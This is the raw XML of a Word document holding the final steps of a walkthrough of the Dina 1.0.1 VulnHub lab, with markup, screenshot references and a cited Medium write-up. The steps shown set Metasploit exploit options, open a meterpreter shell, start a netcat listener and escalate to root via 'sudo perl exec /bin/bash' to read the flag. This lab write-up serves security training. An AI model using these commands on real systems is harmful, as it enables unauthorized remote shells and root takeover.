                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="3558597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59732" name="Picture 35585973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795E" w14:textId="77777777" w:rsidR="004F0E34" w:rsidRDefault="004F0E34" w:rsidP="00801667">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6564DB78" w14:textId="77777777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use I ‘#0’</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A4C26B6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69448001" w14:textId="53B24D4B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0CED1E9" wp14:editId="6957942F">
                  <wp:extent cx="5731510" cy="1951990"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="234683781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83781" name="Picture 21" descr="A screenshot of a compu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45C19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8E85722" w14:textId="54635944" w:rsidR="00F70F22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at I fill </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="003B290C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3EF9868" w14:textId="5F2DEF1E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gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>PASSWORD,RHOST</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>TARGETURI,USERNAME</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>,LHOST)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08230182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19B692CB" w14:textId="78A25EFD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FDCC649" wp14:editId="33AFB7FC">
                  <wp:extent cx="5731510" cy="1334135"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="1817785177" name="Picture 22" descr="A computer screen shot of a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85177" name="Picture 22" descr="A computer screen shot of a program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9DB22" w14:textId="77777777" w:rsidR="00F70F22" w:rsidRDefault="00F70F22" w:rsidP="00801667">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0C2A3464" w14:textId="41FD81D0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giving </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>cmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve"> to </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>meterpreter</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve"> “shell”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A288E1C" w14:textId="77777777" w:rsidR="004F0E34" w:rsidRDefault="004F0E34" w:rsidP="00801667">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7C933F36" w14:textId="77777777" w:rsidR="004F0E34" w:rsidRDefault="004F0E34" w:rsidP="00801667">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="37ECEBD6" w14:textId="77777777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t>Step 9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17483B5A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172035E7" w14:textId="390887A3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fter that open new terminal and use ‘nc’ and then use sudo</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B4BFAFE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49C0AB7F" w14:textId="4919BBF1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[nc -nlvp (port no)] </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BC40565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7F7FF309" w14:textId="2CE8D870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[sudo /usr/bin/perl -e ‘exec (“/bin/bash”)’; ]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E8B66B4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6A9BA08B" w14:textId="2A0FE330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Use (cd /root)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="014D09DC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6F6AF37F" w14:textId="04EFDF10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‘Ls’ then we get “flag.txt”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5ECEA3DF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750C4AC4" w14:textId="037FF45F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Then ‘cat flag.txt’ </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78144684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739D3650" w14:textId="387192AA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And boom we get root flag of dina !! </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C5B98D4" w14:textId="77777777" w:rsidR="00F70F22" w:rsidRDefault="00F70F22" w:rsidP="00801667">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="713997AA" w14:textId="3CE23016" w:rsidR="004F0E34" w:rsidRDefault="004F0E34" w:rsidP="0080166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73213BD" wp14:editId="572C27A7">
                  <wp:extent cx="5731510" cy="3430905"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="2113719797" name="Picture 26" descr="A computer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19797" name="Picture 26" descr="A computer screen shot of a computer program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C57A8" w14:textId="77777777" w:rsidR="004F0E34" w:rsidRPr="005E7C18" w:rsidRDefault="004F0E34" w:rsidP="00801667">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7A21829C" w14:textId="77777777" w:rsidR="004F0E34" w:rsidRDefault="004F0E34" w:rsidP="00801667">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F0E34" w14:paraId="1974ED17" w14:textId="77777777" w:rsidTr="00801667">
        <w:trPr>
          <w:trHeight w:val="691"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1657" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09C20A55" w14:textId="5CF99BF4" w:rsidR="004F0E34" w:rsidRDefault="004F0E34" w:rsidP="008016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8261" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74130A09" w14:textId="45356FA7" w:rsidR="004F0E34" w:rsidRDefault="004F0E34" w:rsidP="00801667">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004F0E34">
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>https://medium.com/@anushibin007/dina-1-0-1-vulnhub-walkthrough-4160122ad0bc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5E5B463E" w14:textId="48C2D4A3" w:rsidR="005E7C18" w:rsidRDefault="005E7C18">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25693532" w14:textId="77777777" w:rsidR="004F0E34" w:rsidRDefault="004F0E34">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EA7974B" w14:textId="1A76513D" w:rsidR="004F0E34" w:rsidRDefault="004F0E34">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F54F707" w14:textId="77777777" w:rsidR="004F0E34" w:rsidRDefault="004F0E34">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="004F0E34" w:rsidSect="00BA245E">
      <w:headerReference w:type="default" r:id="rId30"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="144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8407" w14:textId="77777777" w:rsidR="005064F0" w:rsidRDefault="005064F0" w:rsidP="00BA245E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2D6C14C1" w14:textId="77777777" w:rsidR="005064F0" w:rsidRDefault="005064F0" w:rsidP="00BA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81AF" w14:textId="77777777" w:rsidR="005064F0" w:rsidRDefault="005064F0" w:rsidP="00BA245E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="627D478F" w14:textId="77777777" w:rsidR="005064F0" w:rsidRDefault="005064F0" w:rsidP="00BA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887F" w14:textId="77777777" w:rsidR="00BA245E" w:rsidRDefault="00BA2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5E"/>
    <w:rsid w:val="00022B67"/>
    <w:rsid w:val="00030E4E"/>
    <w:rsid w:val="0006685D"/>
    <w:rsid w:val="00091E08"/>
    <w:rsid w:val="001576AF"/>
    <w:rsid w:val="002A0783"/>
    <w:rsid w:val="00310988"/>
    <w:rsid w:val="00311471"/>
    <w:rsid w:val="003A05E8"/>
    <w:rsid w:val="003A39FA"/>
    <w:rsid w:val="0040179C"/>
    <w:rsid w:val="004F0E34"/>
    <w:rsid w:val="005064F0"/>
    <w:rsid w:val="005E7C18"/>
    <w:rsid w:val="00801667"/>
    <w:rsid w:val="00821E3E"/>
    <w:rsid w:val="009673FA"/>
    <w:rsid w:val="00997CCB"/>
    <w:rsid w:val="00B16728"/>
    <w:rsid w:val="00BA245E"/>
    <w:rsid w:val="00BF70A0"/>
    <w:rsid w:val="00C15BF4"/>
    <w:rsid w:val="00C26CDE"/>
    <w:rsid w:val="00C46C33"/>
    <w:rsid w:val="00CF1FB9"/>
    <w:rsid w:val="00CF7E11"/>
    <w:rsid w:val="00DB38F9"/>
    <w:rsid w:val="00DB4B85"/>
    <w:rsid w:val="00E815F1"/>
    <w:rsid w:val="00E93552"/>
    <w:rsid w:val="00EA1664"/>
    <w:rsid w:val="00F7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8016"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A5007F1F-82AF-4ACD-81B2-F7785DF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4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5E"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BA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5E"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E815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5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://192.168.1.105/secure/backup.zip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.105/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.105/nothin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91E8-CB86-4573-97C0-65AC8D0A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5430777529@gmail.com</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>ayush singh</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-09-02T18:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-16T16:02:00Z</dcterms:modified>
</cp:coreProperties>
</file>